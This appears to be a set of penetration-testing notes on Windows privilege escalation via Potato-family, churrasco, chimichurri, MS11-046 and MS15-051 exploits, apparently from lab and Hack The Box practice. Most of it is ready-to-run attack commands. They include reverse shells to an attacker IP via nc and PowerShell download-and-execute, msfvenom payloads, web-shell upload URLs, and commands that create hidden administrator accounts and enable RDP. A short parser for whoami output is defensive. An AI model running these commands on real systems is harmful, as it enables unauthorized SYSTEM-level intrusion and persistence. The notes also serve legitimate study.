# 4 Kernel Exploits

| Family        | Notes                 | Versions                                                                                            |
| ------------- | --------------------- | --------------------------------------------------------------------------------------------------- |
| Rogue Potato  | Latest version        | SHOULD work on Windows 10                                                                           |
| Juicy Potato  | Upgrade of Rotten     | <p>Server 2008 R2 - no hotfixes<br>Windows 7 Enterprise 6.1.7600</p><p>Patched in latest Win 10</p> |
| Rotten Potato | Old                   | Year: 2016                                                                                          |
| Churrasco     | Non-Potato            |                                                                                                     |
| Chimichurri   | Non-Potato: MS10-059  |                                                                                                     |

## Basics

* <https://github.com/SecWiki/windows-kernel-exploits>
* [GitlabPotatoesWindowsPrivEsc](https://jlajara.gitlab.io/others/2020/11/22/Potatoes_Windows_Privesc.html)

## Required for Potato:

```
> whoami
Local Service

> whoami /priv
SeImpersonatePrivilege ..Enabled
```
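An added auditing helper, not part of these notes, that turns the manual `whoami /priv ..SeImpersonatePrivilege` check above into something you can run over saved output from many hosts. It flags SeImpersonatePrivilege and its sibling SeAssignPrimaryTokenPrivilege (either one makes the Potato family applicable); the sample output is constructed, and the English column layout of `whoami /priv` is assumed.

```python
"""Parse saved `whoami /priv` output and flag impersonation privileges."""
import re

# Privileges that let a process take on another security context. The
# notes name SeImpersonatePrivilege; SeAssignPrimaryTokenPrivilege is the
# second one the Potato tools accept.
IMPERSONATION_PRIVS = {"SeImpersonatePrivilege", "SeAssignPrimaryTokenPrivilege"}

# Constructed sample in the layout whoami /priv prints (English locale).
SAMPLE = """
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
"""

# One privilege row: name, free-text description, then the State column.
ROW = re.compile(r"^(Se\w+Privilege)\s+.*?\s+(Enabled|Disabled)\s*$")


def parse_privs(text):
    """Return {privilege_name: state} for every privilege row in the output."""
    privs = {}
    for line in text.splitlines():
        m = ROW.match(line)
        if m:
            privs[m.group(1)] = m.group(2)
    return privs


def impersonation_risk(text):
    """Impersonation privileges held by the account, sorted by name.

    A 'Disabled' privilege is still held by the token (the holder can
    re-enable it), so both states count as a finding.
    """
    return sorted(p for p in parse_privs(text) if p in IMPERSONATION_PRIVS)


if __name__ == "__main__":
    for name in impersonation_risk(SAMPLE):
        print(f"FINDING: account holds {name}")
```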

## Token Impersonations

Service accounts\
You can't log in interactively as them, but you can escalate from them

## Rogue Potato

* <https://github.com/antonioCoco/RoguePotato>
* <https://github.com/antonioCoco/RoguePotato/releases> (compiled)
* <https://decoder.cloud/2020/05/11/no-more-juicypotato-old-story-welcome-roguepotato/>

```
> RoguePotato.exe -r 10.x.x.x -l 9999 -e "C:\PrivEsc\reverse.exe"
> nc -nvlp 9999
```

## Juicy Potato \*\*BEST\*\*

* Token Impersonation
* <https://github.com/ohpe/juicy-potato>
* [http://ohpe.it/juicy-potato/CLSID](http://ohpe.it/juicy-potato/CLSID/) (or powershell script)
* <https://github.com/ivanitlearning/Juicy-Potato-x86/releases>

```
whoami /priv   ..SeImpersonatePrivilege = JuicyPotato
JuicyPotato.exe -l 5555 -p C:\PrivEsc\reverse.exe -t * -c GUID_CLSID
Juicy.Potato.x86.exe -l 5555 -p "C:\inetpub\wwwroot\shell.exe" -t * -c {F087771F-D74F-4C1A-BB8A-E16ACA9124EA}
JuicyPotato.exe -l 5555 -p c:\Windows\system32\cmd.exe -a "/c C:\inetpub\drupal-7.54\nc.exe -e cmd.exe 10.x.x.x 4555" -t *
JuicyPotato.exe -l 5555 -p c:\Windows\system32\cmd.exe -a "/c C:\inetpub\drupal-7.54\nc.exe -e cmd.exe 10.x.x.x 4555" -t * -c {9B1F122C-2982-4e91-AA8B-E071D54F2A4D}

nc -nvlp 5555
whoami ..system
```

## Juicy Potato + Powershell

* Reverse shell with admin privileges
* JuicyPotato launches an elevated PowerShell, which downloads and executes the reverse-shell .ps1
* <https://ohpe.it/juicy-potato/>
* REF: ArcticHTB

```
> cp /opt/JuicyPotato.exe jp.exe
> cp /opt/nishang/Shells/Invoke-PowerShellTcp.ps1 revshell.ps1
> vim revshell.ps1
Add this to the end of the file:
Invoke-PowerShellTcp -Reverse -IPAddress $IP -Port 7600

> sudo impacket-smbserver kali .

> copy \\10.10.14.34\kali\jp.exe .
> jp.exe -t * -p C:\windows\system32\WindowsPowerShell\v1.0\powershell.exe -l 9001 -a "-c IEX(new-object net.webclient).downloadstring('http://$IP:9090/revshell.ps1')" -c {9B1F122C-2982-4e91-AA8B-E071D54F2A4D}

> nc -lvnp 7600
> whoami ..system!!
```

## Rotten Potato

Exploit from 2016\
Service accounts could obtain a SYSTEM token and impersonate it

## churrasco

* REF: GrannyHTB, GrandpaHTB
* <https://technet.microsoft.com/library/security/ms09-012>
* Token impersonation via churrasco, developed by Cesar Cerrudo, to escalate privileges to System.
* Server 2003 allows Network Service and Local Service to impersonate 'System'.
* Patched by Microsoft in Windows 2012 (MS09-012).
* On newer systems Juicy Potato works fine; on older systems, token impersonation is abused via the churrasco exploit.
* If you have access to a box as `nt authority\network service` (i.e. you managed to upload an ASP.NET shell), you can easily elevate your privileges on the box.
* You can download the exploit [**here**](https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/6705.zip) and compile it yourself, or use the one from `sqlninja`, located at `/usr/share/sqlninja/apps/churrasco.exe`.
* It's used by `sqlninja` in cases where we brute-forced the `sa` password.
* After uploading you can easily:

  * Elevate your privileges.
  * Create an Admin account

  ```
  ------------------------
  Share from Kali/smb:

  locate churrasco.exe
  wget https://github.com/Re4son/Churrasco/raw/master/churrasco.exe
  cp /usr/share/sqlninja/apps/churrasco.exe /tmp
  cp /usr/share/sqlninja/apps/nc.exe /tmp
  msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.98 LPORT=5555 -f exe > /tmp/venomshell.exe

  locate smbserver.py
  cd /usr/share/doc/python3-impacket/examples/
  sudo python3 smbserver.py share /tmp
  nc -nvlp 5555


  ------------------------
  Windows:

  whoami /priv    ..SeImpersonatePrivilege - Yes!
  systeminfo      ..Server 2003 - Yes!

  cd C:\Windows\Temp
  copy \\10.x.x.x\share\nc.exe .
  copy \\10.x.x.x\share\venomshell.exe .
  copy \\10.x.x.x\share\churrasco.exe .

  > \\10.x.x.x\share\churrasco.exe -d whoami
  > churrasco -d "net user /add <username> <password>"
  > churrasco -d "net localgroup administrators <username> /add"
  > churrasco -d "net localgroup \"Remote Desktop Users\" <username> /add"
  > churrasco -d "net user oscp oscp /add && net localgroup Administrators oscp /add"
  > churrasco -d "reg add \"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 0 /f"
  linux> rdesktop -u oscp -p oscp 10.x.x.x

  > churrasco.exe -d venomshell.exe
  > churrasco.exe -d "C:\Windows\Temp\nc.exe 10.x.x.x 5555 -e cmd.exe"
  > \\10.x.x.x\share\churrasco.exe -d "C:\Windows\Temp\nc.exe 10.x.x.x 5555 -e cmd.exe"
  ```

## chimichurri

* MS10-059
* Found with [WindowsExploitSuggester](https://pentest.mxhx.org/win-enum#windows-exploit-suggester)
* Server 2008 R2 Datacenter 6.1.7600 N/A Build 7600 No Patch 64bit
* Also available from github/Re4son:

```
cd /opt
git clone https://github.com/egre55/windows-kernel-exploits
cd "windows-kernel-exploits/MS10-059: Chimichurri/Compiled"
python -m SimpleHTTPServer 4444

cd C:\ColdFusion8\  or:
cd C:\Windows\Temp
echo $webclient = New-Object System.Net.WebClient >wget.ps1
echo $url = "http://$MyIP:4444/Chimichurri.exe" >>wget.ps1
echo $file = "Chimichurri.exe" >>wget.ps1
echo $webclient.DownloadFile($url,$file) >>wget.ps1

powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1
Chimichurri.exe 10.10.14.xx 5555
nc -nvlp 5555
connected ..system!!

----------
or:

cd /usr/share/doc/python3-impacket/examples
sudo python3 ./smbserver.py share /tmp
nc -nvlp 5555

cd C:\Windows\Temp\
copy \\$MyIP\share\Chimichurri.exe .
Chimichurri.exe $MyIP 5555
system!!

----------
chimichurri.exe $MyIP 5555
nc -nvlp 5555
system!
```

## MS11-046 (AFD PrivEsc)

* The Ancillary Function Driver (AFD) in afd.sys does not properly validate user-mode input which allows local users to elevate privileges.
* ms11-046.exe 6.1.7600 Build 7600 - for 32bit only
* <https://www.exploit-db.com/exploits/40564/>

```
https://github.com/abatchy17/WindowsExploits
https://github.com/abatchy17/WindowsExploits/blob/5e9c25cda54fe33fb6e1fd3ae60512a1113b41df/MS11-046/MS11-046.exe

smbserver.py share .
\\10.10.14.34\share\MS11-046.exe
whoami ..system!

https://github.com/rasta-mouse/Watson

or
Download from:
https://www.exploit-db.com/exploits/40564

Compile:
apt install mingw-w64  ..if not installed
i686-w64-mingw32-gcc 40564.c -o 40564.exe -lws2_32

python -m SimpleHTTPServer 8080
wget and curl are not installed on the machine however powershell is.
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.x.x.x:8080/40564.exe', 'c:\Users\Public\Downloads\40564.exe')"
whoami ..system!
```

## MS15-051

* REF: [DrupalPhpVuln](https://pentest.mxhx.org/04-webapps/drupal#serialization-vulnerability-41564-php)

```
MS15-051 privesc
github/hfiref0x ..compiled Taihou64.exe (Firefox flagged it as a virus)
github/SecWiki ..MS15-051 ..compiled ..zipped ..download

cp ms15-051x64.exe .
http://10.x.x.x/ippsec.php?fupload=ms15-051x64.exe&fexec=ms15-051x64.exe whoami
system!

http://10.x.x.x/ippsec.php?fupload=ms15-051x64.exe&fexec=ms15-051x64.exe "nc64.exe -e cmd.exe 10.x.x.x 5555"
nc -nvlp 5555
system!

Bonus PrivEsc:
ms15-051x64.exe whoami   ..easy
```

## Send and Execute

* Execute files from UNC shares
* Ex: [DrupalPhpVuln](https://pentest.mxhx.org/04-webapps/drupal#serialization-vulnerability-41564-php)

```
impacket-smbserver share myfolder
http://10.x.x.x/ippsec.php?fexec=\\10.x.x.x\share\privesc.exe whoami
```
